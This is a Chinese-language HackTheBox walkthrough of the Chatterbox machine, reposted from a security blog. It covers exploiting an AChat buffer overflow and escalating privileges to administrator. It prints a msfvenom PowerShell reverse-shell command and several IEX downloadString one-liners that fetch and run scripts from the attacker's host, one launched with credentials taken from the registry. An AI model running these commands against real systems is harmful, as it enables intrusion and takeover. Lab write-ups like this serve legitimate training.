Skip to content

Latest commit

 

History

History
194 lines (102 loc) · 10.4 KB

HackTheBox-windows-Chatterbox.md

File metadata and controls

194 lines (102 loc) · 10.4 KB

本文由 简悦 SimpRead 转码, 原文地址 mp.weixin.qq.com

大余安全  

一个每日分享渗透小技巧的公众号

大家好,这里是 大余安全 的第 65 篇文章,本公众号会每日分享攻防渗透技术给大家。

靶机地址:https://www.hackthebox.eu/home/machines/profile/123

靶机难度:中级(4.0/10)

靶机发布日期:2018 年 6 月 16 日

靶机描述:

Chatterbox is a fairly straightforward machine that requires basic exploit modification or Metasploit troubleshooting skills to complete.

请注意:对于所有这些计算机,我是通过平台授权允许情况进行渗透的。我将使用 Kali Linux 作为解决该 HTB 的攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,我概不负责。

一、信息收集

可以看到靶机的 IP 是 10.10.10.74.....

nmap 发现运行了 9255http 的服务... 还发现存在缓冲区溢出漏洞...

无法访问...400,回头发现运行了 Achat 服务器上...

存在漏洞,有个 python 能利用... 试试

修改地址后...

可以看到这是建立在 windows 系统上的缓冲区溢出... 这里可以利用 powershell 方向链接靶机...GO

msfvenom -a x86 --platform Windows -p windows/powershell_reverse_tcp LHOST=10.10.14.18 LPORT=6666 -e x86/unicode_mixed -b '\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' BufferRegister=EAX -f python

利用 achat 漏洞创建 windows 上 powershell 的反向 shell... 但是问题来了,可以看到 16974 bytes,Payload 3556,大于 1100 个字节就不能使用有效负荷了... 继续修改...

生成 MSFbuf...

准备好上传的 shell...

将 shell 填入即可....

验证正常的...go

通过 powershell 反向 shell 成功上传了... 获得了低权...

获得 user.txt...

这里有点取巧了,目前我还在低权 Alfred 用户下,发现 administrator 下 desktop 的权限是可以看到 root.txt 文件的... 但是我进去查看内容无法查看... 看到我和 system 高权用户权限是一样的...

可以看到,这里直接在低权用户利用 icacls 获得了 root 信息... 这是人员管理用户给权限的漏洞... (cacls  Windows 实用程序,用于查看 / 编辑文件权限)

虽然拿到了信息... 但是还是要讲述怎么拿到 system 权限的... 继续

目前具有 PowerShell 会话,可以使用 PowerUp 进行提权...

git cloun https://github.com/PowerShellMafia/PowerSploit

下载后上传使用即可...

IEX(NEW-Object Net.webClient).downloadString('http://10.10.14.18/dayu.ps1')

因为在 powershell 下,直接上传...

Invoke-AllChecks

可以看到利用 PowerUp 看到了隐藏在注册表中的一组自动登录凭据...

DefaultUserName      : Alfred
DefaultPassword      : Welcome1!

这里创建一个凭据变量来存储密码... 就是告诉 PowerShell 将先前找到的密码存储在纯文本中,并强制将其保存...

然后创建一个名为 cred 的新变量,并将其用于登录...

直接在利用提权的 shell 即可...

Start-Process -FilePath "powershell" -argumentlist "IEX(New-Object Net.webClient).downloadString('http://10.10.14.18/dayushell.ps1')"  -Credential $cred

可以看到成功获得了 administrator 用户权限...

通过尝试使用 Administrator 帐户重用此密码是成功的,使用 powershell 或打开 SMB 并使用 impacket 的 psexec 来实现了... 完美

这里也能成功获得了 root 信息...

这里介绍了几种方法,大家多多操作,加油!

当然,开局的时候官方的给的方法是:Chatterbox 是一台非常简单的机器,需要基本的漏洞利用修改或 Metasploit 故障排除技能才能完成。

我这里没使用 Metasploit 进行渗透的... 说明 Metasploit 肯定还有方式方法能进行提权.. 

这里有专研精神的,可以继续专研下去,这里可以利用 Metasploit 获得 root 信息...GO

由于我们已经成功得到 root 权限查看 user.txt 和 root.txt,因此完成了简单靶机,希望你们喜欢这台机器,请继续关注大余后期会有更多具有挑战性的机器,一起练习学习。

如果你有其他的方法,欢迎留言。要是有写错了的地方,请你一定要告诉我。要是你觉得这篇博客写的还不错,欢迎分享给身边的人。

如果觉得这篇文章对你有帮助,可以转发到朋友圈,谢谢小伙伴~

欢迎加入渗透学习交流群,想入群的小伙伴们加我微信,共同进步共同成长!

大余安全

一个全栈渗透小技巧的公众号